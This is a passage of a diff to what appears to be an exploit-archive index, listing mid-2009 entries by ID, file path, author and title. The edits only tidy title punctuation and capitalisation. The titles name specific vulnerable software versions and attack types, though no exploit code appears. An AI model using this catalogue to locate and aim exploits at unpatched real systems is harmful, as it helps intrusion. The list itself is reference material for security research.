Vulnerabilities",2009-05-22,Hakxer,php,webapps,0 8777,platforms/windows/dos/8777.txt,"Soulseek 157 NS x / 156.x - Remote Distributed Search Code Execution",2009-05-26,"laurent gaffié ",windows,dos,0 8778,platforms/php/webapps/8778.txt,"minitwitter 0.3-beta (sql/xss) Multiple Vulnerabilities",2009-05-26,YEnH4ckEr,php,webapps,0 8779,platforms/php/webapps/8779.txt,"Joomla Boy Scout Advancement 0.3 (id) SQL Injection Exploit",2009-05-26,YEnH4ckEr,php,webapps,0 @@ -8281,7 +8281,7 @@ id,file,description,date,author,platform,type,port 8781,platforms/php/webapps/8781.txt,"Dokuwiki 2009-02-14 Local File Inclusion Vulnerability",2009-05-26,girex,php,webapps,0 8782,platforms/windows/local/8782.txt,"ArcaVir 2009 < 9.4.320X.9 (ps_drv.sys) Local Privilege Escalation Exploit",2009-05-26,"NT Internals",windows,local,0 8783,platforms/windows/local/8783.c,"Winamp 5.551 MAKI Parsing Integer Overflow Exploit",2009-05-26,n00b,windows,local,0 -8784,platforms/php/webapps/8784.txt,"vBulletin vbBux/vbPlaza <= 2.x (vbplaza.php) Blind SQL Injection Vuln",2009-05-26,"Cold Zero",php,webapps,0 +8784,platforms/php/webapps/8784.txt,"vBulletin vbBux/vbPlaza <= 2.x - (vbplaza.php) Blind SQL Injection Vuln",2009-05-26,"Cold Zero",php,webapps,0 8785,platforms/asp/webapps/8785.txt,"Cute Editor ASP.NET Remote File Disclosure Vulnerability",2009-05-26,Securitylab.ir,asp,webapps,0 8786,platforms/multiple/remote/8786.txt,"Lighttpd < 1.4.23 Source Code Disclosure Vulnerability (BSD/Solaris bug)",2009-05-26,venatir,multiple,remote,0 8787,platforms/php/webapps/8787.txt,"MyFirstCMS <= 1.0.2 - Remote Arbitrary File Delete Vulnerability",2009-05-26,darkjoker,php,webapps,0 @@ -8297,7 +8297,7 @@ id,file,description,date,author,platform,type,port 8797,platforms/php/webapps/8797.txt,"roomphplanning 1.6 - Multiple Vulnerabilities",2009-05-26,"ThE g0bL!N",php,webapps,0 8798,platforms/windows/dos/8798.rb,"Safari RSS feed:// Buffer Overflow via libxml2 Exploit PoC",2009-05-26,"Kevin Finisterre",windows,dos,0 8799,platforms/windows/local/8799.txt,"PHP <= 5.2.9 - Local Safemod Bypass Exploit (win32)",2009-05-26,Abysssec,windows,local,0 -8801,platforms/php/webapps/8801.txt,"Joomla Component com_rsgallery2 1.14.x/2.x Remote Backdoor Vuln",2009-05-26,"Jan Van Niekerk",php,webapps,0 +8801,platforms/php/webapps/8801.txt,"Joomla Component com_rsgallery2 1.14.x/2.x - Remote Backdoor Vuln",2009-05-26,"Jan Van Niekerk",php,webapps,0 8802,platforms/php/webapps/8802.txt,"Kensei Board <= 2.0.0b Multiple SQL Injection Vulnerabilities",2009-05-26,cOndemned,php,webapps,0 8803,platforms/php/webapps/8803.txt,"MyForum 1.3 (Auth Bypass) Remote SQL Injection Vulnerability",2009-05-26,"ThE g0bL!N",php,webapps,0 8804,platforms/windows/remote/8804.py,"Soulseek 157 NS Remote Buffer Overflow Exploit (SEH)",2009-05-26,His0k4,windows,remote,2242 @@ -8307,14 +8307,14 @@ id,file,description,date,author,platform,type,port 8808,platforms/php/webapps/8808.txt,"phpBugTracker 1.0.3 (Auth Bypass) SQL Injection Vulnerability",2009-05-26,ByALBAYX,php,webapps,0 8809,platforms/php/webapps/8809.htm,"ZeeCareers 2.0 (addadminmembercode.php) Add Admin Exploit",2009-05-26,x.CJP.x,php,webapps,0 8810,platforms/php/webapps/8810.txt,"WebMember 1.0 (formID) Remote SQL Injection Vulnerability",2009-05-26,KIM,php,webapps,0 -8811,platforms/php/webapps/8811.txt,"Joomla Component Com_Agora 3.0.0 RC1 Remote File Upload Vulnerability",2009-05-26,ByALBAYX,php,webapps,0 -8812,platforms/php/webapps/8812.txt,"Dokuwiki 2009-02-14 Remote/Temporary File Inclusion exploit",2009-05-26,Nine:Situations:Group,php,webapps,0 +8811,platforms/php/webapps/8811.txt,"Joomla Component Com_Agora 3.0.0 RC1 - Remote File Upload Vulnerability",2009-05-26,ByALBAYX,php,webapps,0 +8812,platforms/php/webapps/8812.txt,"Dokuwiki 2009-02-14 - Remote/Temporary File Inclusion Exploit",2009-05-26,Nine:Situations:Group,php,webapps,0 8813,platforms/php/webapps/8813.txt,"Million Dollar Text Links 1.x Insecure Cookie Handling Vulnerability",2009-05-27,HxH,php,webapps,0 8814,platforms/php/webapps/8814.txt,"Joomla Component AgoraGroup 0.3.5.3 - Blind SQL Injection Vulnerability",2009-05-27,"Chip d3 bi0s",php,webapps,0 8815,platforms/php/webapps/8815.txt,"Easy Px 41 CMS 09.00.00B1 - (fiche) Local File Inclusion Vulnerability",2009-05-27,"ThE g0bL!N",php,webapps,0 8816,platforms/php/webapps/8816.txt,"SiteX <= 0.7.4.418 (THEME_FOLDER) Local File Inclusion Vulnerabilities",2009-05-27,ahmadbady,php,webapps,0 8817,platforms/php/webapps/8817.txt,"Evernew Free Joke Script 1.2 (cat_id) Remote SQL Injection Vulnerability",2009-05-27,taRentReXx,php,webapps,0 -8818,platforms/php/webapps/8818.txt,"AdPeeps 8.5d1 XSS and HTML Injection Vulnerabilities",2009-05-27,intern0t,php,webapps,0 +8818,platforms/php/webapps/8818.txt,"AdPeeps 8.5d1 - XSS and HTML Injection Vulnerabilities",2009-05-27,intern0t,php,webapps,0 8819,platforms/php/webapps/8819.txt,"small pirate v-2.1 (xss/sql) Multiple Vulnerabilities",2009-05-29,YEnH4ckEr,php,webapps,0 8820,platforms/php/webapps/8820.txt,"amember 3.1.7 - (xss/sql/hi) Multiple Vulnerabilities",2009-05-29,intern0t,php,webapps,0 8821,platforms/php/webapps/8821.txt,"Joomla Component JVideo 0.3.x SQL Injection Vulnerability",2009-05-29,"Chip d3 bi0s",php,webapps,0 @@ -8326,13 +8326,13 @@ id,file,description,date,author,platform,type,port 8827,platforms/php/webapps/8827.txt,"ecshop 2.6.2 - Multiple Remote Command Execution Vulnerabilities",2009-05-29,Securitylab.ir,php,webapps,0 8828,platforms/php/webapps/8828.txt,"Arab Portal 2.2 (Auth Bypass) Remote SQL Injection Vulnerability",2009-05-29,"sniper code",php,webapps,0 8829,platforms/php/webapps/8829.txt,"ZeusCart <= 2.3 (maincatid) SQL Injection Vulnerability",2009-05-29,Br0ly,php,webapps,0 -8830,platforms/php/webapps/8830.txt,"Million Dollar Text Links <= 1.0 (id) SQL injection Vulnerability",2009-05-29,Qabandi,php,webapps,0 +8830,platforms/php/webapps/8830.txt,"Million Dollar Text Links <= 1.0 (id) SQL Injection Vulnerability",2009-05-29,Qabandi,php,webapps,0 8831,platforms/php/webapps/8831.txt,"Traidnt Up 2.0 (Auth Bypass / Cookie) SQL Injection Vulnerability",2009-05-29,Qabandi,php,webapps,0 8832,platforms/windows/dos/8832.php,"ICQ 6.5 URL Search Hook (Windows Explorer) Remote BOF PoC",2009-06-01,Nine:Situations:Group,windows,dos,0 8833,platforms/hardware/local/8833.txt,"Linksys WAG54G2 Web Management Console Arbitrary Command Exec",2009-06-01,Securitum,hardware,local,0 8834,platforms/php/webapps/8834.pl,"RadCLASSIFIEDS Gold 2 - (seller) Remote SQL Injection Exploit",2009-06-01,Br0ly,php,webapps,0 8835,platforms/windows/remote/8835.html,"Roxio CinePlayer 3.2 (IAManager.dll) Remote BOF Exploit (heap spray)",2009-06-01,His0k4,windows,remote,0 -8836,platforms/php/webapps/8836.txt,"OCS Inventory NG 1.02 Multiple SQL Injection Vulnerabilities",2009-06-01,"Nico Leidecker",php,webapps,0 +8836,platforms/php/webapps/8836.txt,"OCS Inventory NG 1.02 - Multiple SQL Injection Vulnerabilities",2009-06-01,"Nico Leidecker",php,webapps,0 8837,platforms/windows/dos/8837.txt,"AIMP 2.51 build 330 - (ID3v1/ID3v2 Tag) Remote Stack BOF PoC (SEH)",2009-06-01,LiquidWorm,windows,dos,0 8838,platforms/php/webapps/8838.txt,"elitecms 1.01 (sql/xss) Multiple Vulnerabilities",2009-06-01,xeno_hive,php,webapps,0 8839,platforms/php/webapps/8839.txt,"Open-school 1.0 (id) Remote SQL Injection Vulnerability",2009-06-01,OzX,php,webapps,0 @@ -8356,14 +8356,14 @@ id,file,description,date,author,platform,type,port 8858,platforms/php/webapps/8858.txt,"propertymax pro free (sql/xss) Multiple Vulnerabilities",2009-06-02,SirGod,php,webapps,0 8859,platforms/asp/webapps/8859.txt,"WebEyes Guest Book 3 - (yorum.asp mesajid) SQL Injection Vulnerability",2009-06-02,Bl@ckbe@rD,asp,webapps,0 8860,platforms/php/webapps/8860.txt,"podcast generator <= 1.2 globals[] Multiple Vulnerabilities",2009-06-02,StAkeR,php,webapps,0 -8861,platforms/osx/remote/8861.rb,"Apple iTunes 8.1.1 (ITMS) Multiple Protocol Handler BOF Exploit (meta)",2009-06-03,"Will Drewry",osx,remote,0 +8861,platforms/osx/remote/8861.rb,"Apple iTunes 8.1.1 - (ITMS) Multiple Protocol Handler BOF Exploit (meta)",2009-06-03,"Will Drewry",osx,remote,0 8862,platforms/windows/dos/8862.txt,"Apple QuickTime Image Description Atom Sign Extension PoC",2009-06-03,webDEViL,windows,dos,0 8863,platforms/windows/local/8863.c,"Atomix Virtual Dj Pro 6.0 Stack Buffer Overflow PoC (SEH)",2009-06-03,"fl0 fl0w",windows,local,0 8864,platforms/php/webapps/8864.txt,"My Mini Bill (orderid) Remote SQL Injection Vulnerability",2009-06-03,"ThE g0bL!N",php,webapps,0 8865,platforms/php/webapps/8865.txt,"EgyPlus 7ml <= 1.0.1 (Auth Bypass) SQL Injection Vulnerability",2009-06-03,Qabandi,php,webapps,0 8866,platforms/php/webapps/8866.php,"Podcast Generator <= 1.2 unauthorized Re-Installation Remote Exploit",2009-06-03,StAkeR,php,webapps,0 8867,platforms/php/webapps/8867.pl,"Joomla Component Seminar 1.28 (id) Blind SQL Injection Exploit",2009-06-03,"ThE g0bL!N",php,webapps,0 -8868,platforms/php/webapps/8868.txt,"OCS Inventory NG 1.02 Remote File Disclosure Vulnerability",2009-06-03,"Nico Leidecker",php,webapps,0 +8868,platforms/php/webapps/8868.txt,"OCS Inventory NG 1.02 - Remote File Disclosure Vulnerability",2009-06-03,"Nico Leidecker",php,webapps,0 8869,platforms/php/webapps/8869.txt,"Supernews 2.6 (index.php noticia) Remote SQL Injection Vulnerability",2009-06-03,DD3str0y3r,php,webapps,0 8870,platforms/php/webapps/8870.txt,"Joomla Omilen Photo Gallery 0.5b Local File Inclusion Vulnerability",2009-06-03,ByALBAYX,php,webapps,0 8871,platforms/php/webapps/8871.txt,"Movie PHP Script 2.0 (init.php anticode) Code Execution Vulnerability",2009-06-03,SirGod,php,webapps,0 @@ -8398,14 +8398,14 @@ id,file,description,date,author,platform,type,port 8902,platforms/php/webapps/8902.htm,"Grestul 1.2 - Remote Add Administrator Account Exploit",2009-06-08,"ThE g0bL!N",php,webapps,0 8903,platforms/php/webapps/8903.txt,"DM FileManager 3.9.2 Insecure Cookie Handling Vulnerability",2009-06-08,"ThE g0bL!N",php,webapps,0 8904,platforms/php/webapps/8904.txt,"automated link exchange portal 1.3 - Multiple Vulnerabilities",2009-06-08,TiGeR-Dz,php,webapps,0 -8905,platforms/php/webapps/8905.txt,"Joomla Component com_portafolio (cid) SQL injection Vulnerability",2009-06-08,"Chip d3 bi0s",php,webapps,0 -8906,platforms/php/webapps/8906.pl,"Shop Script Pro 2.12 Remote SQL Injection Exploit",2009-06-08,Ams,php,webapps,0 -8907,platforms/multiple/remote/8907.txt,"Apple Safari <= 3.2.x (XXE attack) Local File Theft Vulnerability",2009-06-09,"Chris Evans",multiple,remote,0 +8905,platforms/php/webapps/8905.txt,"Joomla Component com_portafolio (cid) SQL Injection Vulnerability",2009-06-08,"Chip d3 bi0s",php,webapps,0 +8906,platforms/php/webapps/8906.pl,"Shop Script Pro 2.12 - Remote SQL Injection Exploit",2009-06-08,Ams,php,webapps,0 +8907,platforms/multiple/remote/8907.txt,"Apple Safari <= 3.2.x - (XXE attack) Local File Theft Vulnerability",2009-06-09,"Chris Evans",multiple,remote,0 8908,platforms/php/webapps/8908.txt,"Joomla Component BookLibrary 1.5.2.4 - Remote File Inclusion Vuln",2009-06-09,"Mehmet Ince",php,webapps,0 8911,platforms/php/webapps/8911.txt,"Joomla Component Akobook 2.3 (gbid) SQL Injection Vulnerability",2009-06-09,Ab1i,php,webapps,0 8912,platforms/php/webapps/8912.txt,"Joomla Component com_media_library 1.5.3 RFI Vulnerability",2009-06-09,"Mehmet Ince",php,webapps,0 -8913,platforms/php/webapps/8913.txt,"S-CMS <= 2.0b3 Multiple Local File Inclusion Vulnerabilities",2009-06-09,YEnH4ckEr,php,webapps,0 -8914,platforms/php/webapps/8914.txt,"S-CMS <= 2.0b3 Multiple SQL Injection Vulnerabilities",2009-06-09,YEnH4ckEr,php,webapps,0 +8913,platforms/php/webapps/8913.txt,"S-CMS <= 2.0b3 - Multiple Local File Inclusion Vulnerabilities",2009-06-09,YEnH4ckEr,php,webapps,0 +8914,platforms/php/webapps/8914.txt,"S-CMS <= 2.0b3 - Multiple SQL Injection Vulnerabilities",2009-06-09,YEnH4ckEr,php,webapps,0 8915,platforms/php/webapps/8915.pl,"S-CMS <= 2.0b3 (username) Blind SQL Injection Exploit",2009-06-09,YEnH4ckEr,php,webapps,0 8916,platforms/windows/remote/8916.py,"Free Download Manager 2.5/3.0 (Control Server) Remote BOF Exploit",2009-06-09,His0k4,windows,remote,80 8917,platforms/php/webapps/8917.txt,"mrcgiguy the ticket system 2.0 php Multiple Vulnerabilities",2009-06-09,"ThE g0bL!N",php,webapps,0 @@ -8432,15 +8432,15 @@ id,file,description,date,author,platform,type,port 8938,platforms/windows/remote/8938.txt,"Green Dam 3.17 (URL) Remote Buffer Overflow Exploit (xp/sp2)",2009-06-12,seer[N.N.U],windows,remote,0 8939,platforms/php/webapps/8939.pl,"phpWebThings <= 1.5.2 MD5 Hash Retrieve/File Disclosure Exploit",2009-06-12,StAkeR,php,webapps,0 8940,platforms/multiple/dos/8940.pl,"Asterisk IAX2 Resource Exhaustion via Attacked IAX Fuzzer",2009-06-12,"Blake Cornell",multiple,dos,0 -8941,platforms/php/webapps/8941.txt,"pivot 1.40.4-7 Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps,0 -8942,platforms/php/webapps/8942.txt,"tbdev 01-01-2008 Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps,0 -8943,platforms/php/webapps/8943.txt,"translucid 1.75 Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps,0 +8941,platforms/php/webapps/8941.txt,"pivot 1.40.4-7 - Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps,0 +8942,platforms/php/webapps/8942.txt,"tbdev 01-01-2008 - Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps,0 +8943,platforms/php/webapps/8943.txt,"translucid 1.75 - Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps,0 8944,platforms/php/webapps/8944.txt,"Uebimiau Web-Mail <= 3.2.0-1.8 - Remote File / Overwrite Vulnerabilities",2009-06-12,GoLd_M,php,webapps,0 8946,platforms/php/webapps/8946.txt,"Joomla Component com_Projectfork 2.0.10 Local File Inclusion Vuln",2009-06-15,ByALBAYX,php,webapps,0 8947,platforms/php/webapps/8947.txt,"impleo music collection 2.0 (sql/xss) Multiple Vulnerabilities",2009-06-15,SirGod,php,webapps,0 8948,platforms/php/webapps/8948.txt,"Mundi Mail 0.8.2 (top) Remote File Inclusion Vulnerability",2009-06-15,Br0ly,php,webapps,0 8949,platforms/php/webapps/8949.txt,"SugarCRM 5.2.0e Remote Code Execution Vulnerability",2009-06-15,USH,php,webapps,0 -8950,platforms/php/webapps/8950.txt,"formmail 1.92 Multiple Vulnerabilities",2009-06-15,USH,php,webapps,0 +8950,platforms/php/webapps/8950.txt,"formmail 1.92 - Multiple Vulnerabilities",2009-06-15,USH,php,webapps,0 8951,platforms/php/webapps/8951.php,"DB Top Sites 1.0 - Remote Command Execution Exploit",2009-06-15,SirGod,php,webapps,0 8952,platforms/php/webapps/8952.txt,"DB Top Sites 1.0 (index.php u) Local File Inclusion Vulnerability",2009-06-15,SirGod,php,webapps,0 8953,platforms/php/webapps/8953.txt,"elvin bts 1.2.0 - Multiple Vulnerabilities",2009-06-15,SirGod,php,webapps,0 @@ -8448,7 +8448,7 @@ id,file,description,date,author,platform,type,port 8955,platforms/linux/dos/8955.pl,"LinkLogger 2.4.10.15 (syslog) Denial of Service Exploit",2009-06-15,h00die,linux,dos,0 8956,platforms/php/webapps/8956.htm,"Evernew Free Joke Script 1.2 - Remote Change Password Exploit",2009-06-15,Hakxer,php,webapps,0 8957,platforms/multiple/dos/8957.txt,"Apple Safari & Quicktime Denial of Service Vulnerability",2009-06-15,"Thierry Zoller",multiple,dos,0 -8958,platforms/php/webapps/8958.txt,"torrenttrader classic 1.09 Multiple Vulnerabilities",2009-06-15,waraxe,php,webapps,0 +8958,platforms/php/webapps/8958.txt,"torrenttrader classic 1.09 - Multiple Vulnerabilities",2009-06-15,waraxe,php,webapps,0 8959,platforms/php/webapps/8959.pl,"Joomla Component com_ijoomla_rss Blind SQL Injection Exploit",2009-06-15,"Mehmet Ince",php,webapps,0 8960,platforms/linux/dos/8960.py,"Apple QuickTime CRGN Atom Local Crash Exploit",2009-06-15,webDEViL,linux,dos,0 8961,platforms/php/webapps/8961.txt,"WordPress Plugin Photoracer 1.0 (id) SQL Injection Vulnerability",2009-06-15,Kacper,php,webapps,0 @@ -8457,7 +8457,7 @@ id,file,description,date,author,platform,type,port 8964,platforms/hardware/dos/8964.txt,"Netgear DG632 Router Remote Denial of Service Vulnerability",2009-06-15,"Tom Neaves",hardware,dos,0 8965,platforms/php/webapps/8965.txt,"vBulletin Radio and TV Player Add-On HTML Injection Vulnerability",2009-06-15,d3v1l,php,webapps,0 8966,platforms/php/webapps/8966.txt,"phportal 1- (topicler.php id) Remote SQL Injection Vulnerability",2009-06-15,"Mehmet Ince",php,webapps,0 -8967,platforms/php/webapps/8967.txt,"The Recipe Script 5 Remote XSS Vulnerability",2009-06-15,"ThE g0bL!N",php,webapps,0 +8967,platforms/php/webapps/8967.txt,"The Recipe Script 5 - Remote XSS Vulnerability",2009-06-15,"ThE g0bL!N",php,webapps,0 8968,platforms/php/webapps/8968.txt,"Joomla Component com_jumi (fileid) Blind SQL Injection Exploit",2009-06-15,"Chip d3 bi0s",php,webapps,0 8969,platforms/windows/remote/8969.rb,"Green Dam 3.17 URL Processing Buffer Overflow Exploit (meta)",2009-06-16,Trancer,windows,remote,0 8970,platforms/windows/remote/8970.txt,"McAfee 3.6.0.608 naPolicyManager.dll ActiveX Arbitrary Data Write Vuln",2009-06-16,callAX,windows,remote,0 @@ -8479,9 +8479,9 @@ id,file,description,date,author,platform,type,port 8990,platforms/php/webapps/8990.txt,"phpDatingClub 3.7 - Remote SQL/XSS Injection Vulnerabilities",2009-06-22,"ThE g0bL!N",php,webapps,0 8991,platforms/multiple/dos/8991.php,"Multiple HTTP Server - Low Bandwidth Denial of Service (2)",2009-06-22,evilrabbi,multiple,dos,0 8992,platforms/php/webapps/8992.php,"pmaPWN! - phpMyAdmin Code Injection RCE Scanner & Exploit",2009-06-22,"Hacking Expose!",php,webapps,0 -8993,platforms/php/webapps/8993.txt,"elgg (xss/csrf/change password) Multiple Vulnerabilities",2009-06-22,lorddemon,php,webapps,0 +8993,platforms/php/webapps/8993.txt,"elgg (xss/CSRF/change password) Multiple Vulnerabilities",2009-06-22,lorddemon,php,webapps,0 8994,platforms/php/webapps/8994.txt,"AWScripts Gallery Search Engine 1.x Insecure Cookie Vulnerability",2009-06-22,TiGeR-Dz,php,webapps,0 -8995,platforms/php/webapps/8995.txt,"Campsite 3.3.0 RC1 Multiple Remote File Inclusion Vulnerabilities",2009-06-22,CraCkEr,php,webapps,0 +8995,platforms/php/webapps/8995.txt,"Campsite 3.3.0 RC1 - Multiple Remote File Inclusion Vulnerabilities",2009-06-22,CraCkEr,php,webapps,0 8996,platforms/php/webapps/8996.txt,"Gravy Media Photo Host 1.0.8 - Local File Disclosure Vulnerability",2009-06-22,Lo$er,php,webapps,0 8997,platforms/php/webapps/8997.txt,"kasseler cms (fd/xss) Multiple Vulnerabilities",2009-06-22,S(r1pt,php,webapps,0 8998,platforms/php/webapps/8998.txt,"Sourcebans <= 1.4.2 Arbitrary Change Admin Email Vulnerability",2009-06-22,"Mr. Anonymous",php,webapps,0 @@ -8491,7 +8491,7 @@ id,file,description,date,author,platform,type,port 9002,platforms/windows/remote/9002.c,"Bopup Communications Server 3.2.26.5460 Remote SYSTEM Exploit",2009-06-22,mu-b,windows,remote,19810 9004,platforms/php/webapps/9004.txt,"Zen Cart 1.3.8 - Remote Code Execution Exploit",2009-06-23,BlackH,php,webapps,0 9005,platforms/php/webapps/9005.py,"Zen Cart 1.3.8 - Remote SQL Execution Exploit",2009-06-23,BlackH,php,webapps,0 -9006,platforms/windows/dos/9006.py,"HP Data Protector 4.00-SP1b43064 Remote Memory Leak/Dos Exploit",2009-06-23,Nibin,windows,dos,0 +9006,platforms/windows/dos/9006.py,"HP Data Protector 4.00-SP1b43064 - Remote Memory Leak/Dos Exploit",2009-06-23,Nibin,windows,dos,0 9007,platforms/windows/dos/9007.rb,"HP Data Protector 4.00-SP1b43064 - Remote Memory Leak/Dos (meta)",2009-06-23,Nibin,windows,dos,0 9008,platforms/php/webapps/9008.txt,"phpCollegeExchange 0.1.5c (RFI/LFI/XSS) Multiple Vulnerabilities",2009-06-23,CraCkEr,php,webapps,0 9009,platforms/php/webapps/9009.txt,"BASE <= 1.2.4 (Auth Bypass) Insecure Cookie Handling Vulnerability",2009-06-24,"Tim Medin",php,webapps,0 @@ -8507,7 +8507,7 @@ id,file,description,date,author,platform,type,port 9020,platforms/php/webapps/9020.py,"AlumniServer 1.0.1 (resetpwemail) Blind SQL Injection Exploit",2009-06-25,YEnH4ckEr,php,webapps,0 9021,platforms/php/webapps/9021.txt,"MD-Pro 1.083.x Survey Module (pollID) Blind SQL Injection Vulnerability",2009-06-25,XaDoS,php,webapps,0 9022,platforms/php/webapps/9022.txt,"Virtue Online Test Generator (AB/SQL/XSS) Multiple Vulnerabilities",2009-06-26,HxH,php,webapps,0 -9023,platforms/php/webapps/9023.txt,"PHP-Address Book 4.0.x Multiple SQL Injection Vulnerabilities",2009-06-26,YEnH4ckEr,php,webapps,0 +9023,platforms/php/webapps/9023.txt,"PHP-Address Book 4.0.x - Multiple SQL Injection Vulnerabilities",2009-06-26,YEnH4ckEr,php,webapps,0 9024,platforms/php/webapps/9024.txt,"ForumPal FE 1.1 (Auth Bypass) Remote SQL Injection Vulnerability",2009-06-26,"ThE g0bL!N",php,webapps,0 9025,platforms/php/webapps/9025.txt,"Mega File Manager 1.0 (index.php page) LFI Vulnerability",2009-06-26,SirGod,php,webapps,0 9026,platforms/php/webapps/9026.txt,"WHOISCART (Auth Bypass) Information Disclosure Vulnerability",2009-06-29,SecurityRules,php,webapps,0 @@ -8539,14 +8539,14 @@ id,file,description,date,author,platform,type,port 9054,platforms/php/webapps/9054.txt,"WordPress Plugin Related Sites 2.1 - Blind SQL Injection Vulnerability",2009-06-30,eLwaux,php,webapps,0 9055,platforms/php/webapps/9055.pl,"PunBB Affiliates Mod <= 1.1 - Remote Blind SQL Injection Exploit",2009-06-30,Dante90,php,webapps,0 9056,platforms/php/webapps/9056.txt,"MDPro Module CWGuestBook <= 2.1 - Remote SQL Injection Vulnerability",2009-06-30,Dante90,php,webapps,0 -9057,platforms/php/webapps/9057.txt,"tsep <= 0.942.02 Multiple Vulnerabilities",2009-06-30,eLwaux,php,webapps,0 +9057,platforms/php/webapps/9057.txt,"tsep <= 0.942.02 - Multiple Vulnerabilities",2009-06-30,eLwaux,php,webapps,0 9058,platforms/php/webapps/9058.pl,"PunBB Extension Vote For Us <= 1.0.1 - Blind SQL Injection Exploit",2009-06-30,Dante90,php,webapps,0 9059,platforms/php/webapps/9059.htm,"Messages Library 2.0 Arbitrary Administrator Account Vulnerability",2009-06-30,"ThE g0bL!N",php,webapps,0 9060,platforms/windows/local/9060.pl,"MP3-Nator 2.0 (plf File) Universal Buffer Overflow Exploit (SEH)",2009-07-01,"ThE g0bL!N",windows,local,0 9061,platforms/windows/dos/9061.pl,"PEamp 1.02b (.M3U File) Local Buffer Overflow PoC",2009-07-01,"ThE g0bL!N",windows,dos,0 9062,platforms/php/webapps/9062.txt,"Messages Library 2.0 Arbitrary Delete Message Vulnerability",2009-07-01,Stack,php,webapps,0 9063,platforms/php/webapps/9063.txt,"Messages Library 2.0 Insecure Cookie Handling Vulnerability",2009-07-01,Stack,php,webapps,0 -9064,platforms/windows/local/9064.pl,"AudioPLUS 2.00.215 (.lst & .m3u File) Local buffer Overflow (seh)",2009-07-01,hack4love,windows,local,0 +9064,platforms/windows/local/9064.pl,"AudioPLUS 2.00.215 (.lst & .m3u File) Local Buffer Overflow (seh)",2009-07-01,hack4love,windows,local,0 9065,platforms/windows/remote/9065.c,"Green Dam Remote Change System Time Exploit",2009-07-01,"Anti GD",windows,remote,0 9066,platforms/hardware/remote/9066.txt,"ARD-9808 DVR Card Security Camera Arbitrary Config Disclosure Vuln",2009-07-01,Septemb0x,hardware,remote,0 9067,platforms/hardware/dos/9067.py,"ARD-9808 DVR Card Security Camera (GET Request) Remote DoS Exploit",2009-07-01,Stack,hardware,dos,0 @@ -8576,24 +8576,24 @@ id,file,description,date,author,platform,type,port 9092,platforms/php/webapps/9092.txt,"webasyst shop-script (bsql/xss) Multiple Vulnerabilities",2009-07-09,Vrs-hCk,php,webapps,0 9093,platforms/windows/remote/9093.txt,"windows live messenger plus! fileserver 1.0 - Directory Traversal vuln",2009-07-09,joepie91,windows,remote,0 9094,platforms/php/webapps/9094.txt,"EasyVillaRentalSite (Id) Remote SQL Injection Vulnerability",2009-07-09,BazOka-HaCkEr,php,webapps,0 -9095,platforms/php/webapps/9095.txt,"talkback 2.3.14 Multiple Vulnerabilities",2009-07-09,JIKO,php,webapps,0 +9095,platforms/php/webapps/9095.txt,"talkback 2.3.14 - Multiple Vulnerabilities",2009-07-09,JIKO,php,webapps,0 9096,platforms/windows/remote/9096.txt,"Sun One WebServer 6.1 JSP Source Viewing Vulnerability",2009-07-09,kingcope,windows,remote,0 9097,platforms/multiple/local/9097.txt,"xscreensaver 5.01 Arbitrary File Disclosure Symlink Attack Vulnerability",2009-07-09,kingcope,multiple,local,0 9098,platforms/php/webapps/9098.txt,"Siteframe CMS 3.2.x SQL Injection/phpinfo() Multiple Vulnerabilities",2009-07-09,NoGe,php,webapps,0 9099,platforms/php/webapps/9099.pl,"Universe CMS 1.0.6 (vnews.php id) Remote SQL Injection Exploit",2009-07-09,Mr.tro0oqy,php,webapps,0 9100,platforms/windows/dos/9100.html,"Microsoft Internet Explorer (AddFavorite) Remote Crash PoC",2009-07-09,Sberry,windows,dos,0 -9101,platforms/php/webapps/9101.txt,"phpbms 0.96 Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0 +9101,platforms/php/webapps/9101.txt,"phpbms 0.96 - Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0 9102,platforms/windows/dos/9102.pl,"PatPlayer 3.9 (M3U File) Local Heap Overflow PoC",2009-07-10,Cyber-Zone,windows,dos,0 -9103,platforms/php/webapps/9103.txt,"gencms 2006 Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0 +9103,platforms/php/webapps/9103.txt,"gencms 2006 - Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0 9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro <= 8.02 - (.pdm) Local BOF Exploit (SEH)",2009-07-10,His0k4,windows,local,0 9105,platforms/php/webapps/9105.txt,"MyMsg 1.0.3 (uid) Remote SQL Injection Vulnerability",2009-07-10,Monster-Dz,php,webapps,0 9106,platforms/windows/remote/9106.txt,"citrix xencenterweb (xss/sql/rce) Multiple Vulnerabilities",2009-07-10,"Secure Network",windows,remote,0 9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 (login.php user) Blind SQL Injection Vulnerability",2009-07-10,IRCRASH,php,webapps,0 -9108,platforms/windows/remote/9108.py,"MS Internet Explorer 7 Video ActiveX Remote Buffer Overflow Exploit",2009-07-10,"David Kennedy (ReL1K)",windows,remote,0 +9108,platforms/windows/remote/9108.py,"Microsoft Internet Explorer 7 Video ActiveX Remote Buffer Overflow Exploit",2009-07-10,"David Kennedy (ReL1K)",windows,remote,0 9109,platforms/php/webapps/9109.txt,"ToyLog 0.1 - SQL Injection Vulnerability/RCE Exploit",2009-07-10,darkjoker,php,webapps,0 9110,platforms/php/webapps/9110.txt,"WordPress Privileges Unchecked in admin.php and Multiple Information",2009-07-10,"Core Security",php,webapps,0 9111,platforms/php/webapps/9111.txt,"Jobbr 2.2.7 - Multiple Remote SQL Injection Vulnerabilities",2009-07-10,Moudi,php,webapps,0 -9112,platforms/php/webapps/9112.txt,"Joomla Component com_propertylab (auction_id) SQL injection Vuln",2009-07-10,"Chip d3 bi0s",php,webapps,0 +9112,platforms/php/webapps/9112.txt,"Joomla Component com_propertylab (auction_id) SQL Injection Vuln",2009-07-10,"Chip d3 bi0s",php,webapps,0 9113,platforms/windows/dos/9113.txt,"OtsAv DJ/TV/Radio Multiple Local Heap Overflow PoCs",2009-07-10,Stack,windows,dos,0 9114,platforms/windows/dos/9114.txt,"eEye Retina WiFi Security Scanner 1.0 (.rws Parsing) Buffer Overflow PoC",2009-07-10,LiquidWorm,windows,dos,0 9115,platforms/php/webapps/9115.txt,"Digitaldesign CMS 0.1 - Remote Database Disclosure 